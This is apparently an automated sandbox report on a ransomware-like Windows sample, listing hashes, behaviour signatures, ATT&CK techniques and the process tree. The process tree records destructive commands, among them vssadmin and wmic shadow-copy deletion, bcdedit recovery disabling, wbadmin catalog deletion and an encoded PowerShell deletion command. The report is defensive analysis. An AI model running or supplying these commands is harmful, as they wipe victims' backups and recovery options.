Analysis

  • max time kernel
    109s
  • max time network
    135s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    21-07-2020 16:33

General

  • Target

    svchost.bin.exe

  • Size

    312KB

  • MD5

    fbd82a5f5bfe23872fad17cf62c41a6e

  • SHA1

    03dff661da8207517fc4cb3c0809e8c0fe7f76fa

  • SHA256

    a1b6faa0465ec8bf30e3450f9679f121ff9e724257577c38c813b77e82e1f42f

  • SHA512

    ac653d1f6b2222c56c3b73715219028a70ca078c87585a11ee2260d68d336e76a794d5d4c111c7c423aa916ed375d18a0cc3a6eb4789e40414243467e11da9bc

Malware Config

Signatures

  • Suspicious use of WriteProcessMemory 18 IoCs
  • Drops file in Drivers directory 1 IoCs
  • System policy modification 1 TTPs 17 IoCs
  • UAC bypass 3 TTPs
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Program crash 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies service 2 TTPs 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\svchost.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.bin.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Drops file in Drivers directory
    • System policy modification
    • Suspicious behavior: EnumeratesProcesses
    • Checks whether UAC is enabled
    PID:2112
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C sc config "AppCheck" start=disabled
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2672
      • C:\Windows\SysWOW64\sc.exe
        sc config "AppCheck" start=disabled
        3⤵
          PID:3004
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2856
        • C:\Windows\SysWOW64\vssadmin.exe
          vssadmin delete shadows /all /quiet
          3⤵
          • Interacts with shadow copies
          PID:2920
        • C:\Windows\SysWOW64\Wbem\WMIC.exe
          wmic shadowcopy delete
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3152
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        2⤵
          PID:3532
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3532 -s 704
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Program crash
            • Suspicious use of AdjustPrivilegeToken
            PID:1840
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Modifies service
        • Suspicious use of AdjustPrivilegeToken
        PID:1492

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Persistence

      Modify Existing Service

      1
      T1031

      Privilege Escalation

      Bypass User Account Control

      1
      T1088

      Defense Evasion

      Modify Registry

      3
      T1112

      Bypass User Account Control

      1
      T1088

      Disabling Security Tools

      1
      T1089

      File Deletion

      2
      T1107

      Discovery

      System Information Discovery

      1
      T1082

      Impact

      Inhibit System Recovery

      2
      T1490

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1840-7-0x0000000004680000-0x0000000004681000-memory.dmp
        Filesize

        4KB

      • memory/1840-15-0x0000000004870000-0x0000000004871000-memory.dmp
        Filesize

        4KB

      • memory/1840-6-0x0000000004680000-0x0000000004681000-memory.dmp
        Filesize

        4KB

      • memory/2672-0-0x0000000000000000-mapping.dmp
      • memory/2856-1-0x0000000000000000-mapping.dmp
      • memory/2920-4-0x0000000000000000-mapping.dmp
      • memory/3004-3-0x0000000000000000-mapping.dmp
      • memory/3152-5-0x0000000000000000-mapping.dmp
      • memory/3532-9-0x0000000000000000-mapping.dmp
      • memory/3532-11-0x0000000000000000-mapping.dmp
      • memory/3532-10-0x0000000000000000-mapping.dmp
      • memory/3532-12-0x0000000000000000-mapping.dmp
      • memory/3532-13-0x0000000000000000-mapping.dmp
      • memory/3532-14-0x0000000000000000-mapping.dmp
      • memory/3532-2-0x0000000000000000-mapping.dmp